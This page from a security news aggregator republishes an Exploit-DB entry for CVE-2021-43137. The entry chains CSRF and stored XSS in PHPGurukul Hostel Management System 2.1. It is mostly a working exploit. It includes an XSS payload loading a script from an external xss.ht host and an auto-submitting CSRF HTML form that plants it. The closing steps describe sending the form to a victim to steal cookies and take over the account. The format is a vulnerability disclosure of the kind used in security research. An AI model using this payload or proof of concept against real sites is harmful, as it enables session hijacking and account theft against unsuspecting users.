Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-43137: Offensive Security’s Exploit Database Archive

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerability exits in hostel management system 2.1 via the name field in my-profile.php. Chaining to this both vulnerabilities leads to account takeover.

CVE
#xss#csrf#vulnerability#windows
# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
# Date: 2021-10-27
# Exploit Author: Anubhav Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php
# Tested on Windows 10, XAMPP

Steps to reproduce:

1) Navigate to http://localhost/hostel/hostel/my-profile.php 
2) Enter xss payload "><script src=https://anubhav1403.xss.ht></script> in name field
3) Click on Update Profile and intercept the request in Burpsuite
4) Generate a CSRF POC of Update Profile

```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hostel/hostel/my-profile.php" method="POST">
      <input type="hidden" name="regno" value="123456" />
      <input type="hidden" name="fname" value=""><script&#32;src&#61;https&#58;&#47;&#47;anubhav1403&#46;xss&#46;ht><&#47;script>" />
      <input type="hidden" name="mname" value="Hello" />
      <input type="hidden" name="lname" value="Singh" />
      <input type="hidden" name="gender" value="male" />
      <input type="hidden" name="contact" value="12345678995" />
      <input type="hidden" name="email" value="anubhav&#64;gmail&#46;com" />
      <input type="hidden" name="update" value="Update&#32;Profile" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

5) Send this POC to victim
6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires.
7) Now attacker get's the details of victim like ip address, cookies of Victim, etc
8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!!

#POC

https://ibb.co/jVcZxnt
https://ibb.co/DwGh4x9

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907